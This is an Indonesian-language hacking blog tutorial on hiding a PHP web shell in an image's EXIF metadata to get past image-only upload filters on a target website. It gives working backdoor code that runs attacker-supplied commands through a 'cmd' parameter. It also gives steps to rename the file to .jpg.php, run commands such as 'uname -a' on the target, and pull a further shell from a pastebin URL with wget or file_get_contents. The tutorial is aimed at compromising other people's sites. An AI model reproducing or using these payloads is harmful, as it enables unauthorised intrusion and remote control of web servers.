shell backdoor |
Mungkin beberapa dari kalian yang pernah masuk kedalam sistem dashboard suatu website akan tetapi pada saat sedang mengupload shell tidak bisa dikarenakan file yang diperbolehkan adalah image only dan biar ditamper pun tidak akan bisa. Berikut tutorial membypass nya dengan menyisipkan backdoor PHP ke dalam gambar.
Bahan - Bahan yang diperlukan (Windows ):
- Exif Editor ( Download Disini )
- Gambar yang akan di sisipkan
Code Backdoor PHP :
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1><?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img src="LINK GAMBAR" border=0>';}__halt_compiler();?></h1>Tips! : LINK GAMBAR isilah dengan url gambar kalian contohnya
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1><?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img src="https://dummyimage.com/1280x510/000/fff.jpg" border=0>';}__halt_compiler();?></h1>
Step cara caranya :
- Bukalah Exif Editor
- Kemudia klik Open lalu pilihlah gambar yang ingin disisipkan Backdoor PHP.
- Klik gambar plus (+)
Klik Yes.
- Setelah itu Isilah Type sesuai gambar dibawah ini dan juga isilah Value dengan keinginan kalian, lalu klik Add.
- Kemduian lakukan klik 1 Pending Change
- Setelah itu klik Edit Modification
- Lalu Masukan kode PHP yang ada di atas tadi kedalam New Value lalu kemudian klik Save
- Lalu Klik Save
Setelah itu Pilih lah tempat penyimpanan gambar yang sudah di inject tadi dan klik save
- Ubahlah extensi gambar tadi menjadi
namagambar.jpg.php
- Dan cobalah cek menggunakan notepad ++ apakah sudah terinject.
Dan ternyata sudah terinject/ tersisipkan
- Kemudian Kalian coba upload ke website target dan ketika sudah berhasil mengupload lalu akses lah gambar tadi dan coba masukan ?cmd= pada belakang nama gambar contohnya target.com/mastahcyber.jpg.php?cmd= lalu masukan perintah berikut uname -a contohnya ?cmd= uname -a dan jika muncul keterangan server target berarti berhasil seperti gambar dibawah ini.
- Selanjutnya cobalah upload shell menggunakan perintah.
echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/en5tp4kX"));?>' > shell.php
Bisa juga
wget https://pastebin.com/raw/en5tp4kX -O shell.php
- Cobalah kamu akses shell yang sudah kamu upload tadi sesuai nama shell dan letak dir. contohnya target.com/shell.php
Dan shell pun terupload dan kita berhasil membypass nya nah mudah kan.
Sekian dulu tutorial dari om heker, sampai jumpa di tutorial berikutnya dan nantikanlah tutorial menarik lainnya. jangan lupa share ya
Penulusuran terkait:
cara menyisipkan backdoor metasploit ke gambar termux
cara inject php ke gambar
membuat exploit dengan gambar
jhead termux
backdoor image php
menyisipkan file backdoor menggunakan termux
cara membuat backdoor dengan kali linux
exif php shell
0 Response to "Bagaimana Menyisipkan Backdoor PHP Ke Dalam file Gambar"
Post a Comment